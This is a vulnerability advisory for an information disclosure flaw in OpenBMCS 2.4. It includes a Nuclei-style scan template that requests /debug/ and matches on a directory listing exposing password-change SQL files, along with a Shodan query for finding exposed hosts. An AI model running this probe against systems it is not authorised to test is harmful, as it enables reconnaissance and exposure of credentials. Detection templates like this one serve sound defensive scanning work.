openbmcs-secret-disclosure: OpenBMCS 2.4 - Information Disclosure

Date: 2025-08-01 | Affected software: OpenBMCS | PoC: public

Vulnerability description

OpenBMCS 2.4 contains an information disclosure vulnerability. The application allows directory listing and exposure of some sensitive files, which can allow an attacker to leverage the disclosed information and gain full access.

PoC code [public]

id: openbmcs-secret-disclosure

info:
  name: OpenBMCS 2.4 - Information Disclosure
  author: dhiyaneshDK
  severity: high
  description: OpenBMCS 2.4 contains an information disclosure vulnerability. The application allows directory listing and exposure of some sensitive files, which can allow an attacker to leverage the disclosed information and gain full access.
  reference:
    - https://www.exploit-db.com/exploits/50671
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:1550906681
  tags: misconfig,edb,openbmcs,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/debug/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "change_password_sqls"
          - "Index of /debug"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cf91697ec114cc6e67c711d17ae9e2fc45b1a4f04ab68cc2fc5d5c2524025def022100aa5df8ac79b9584518f8d8cbc246cfb5f7a903bbcc2e3a35341fe1d9b25603d7:922c64590222798bb761d5b6d8e72950
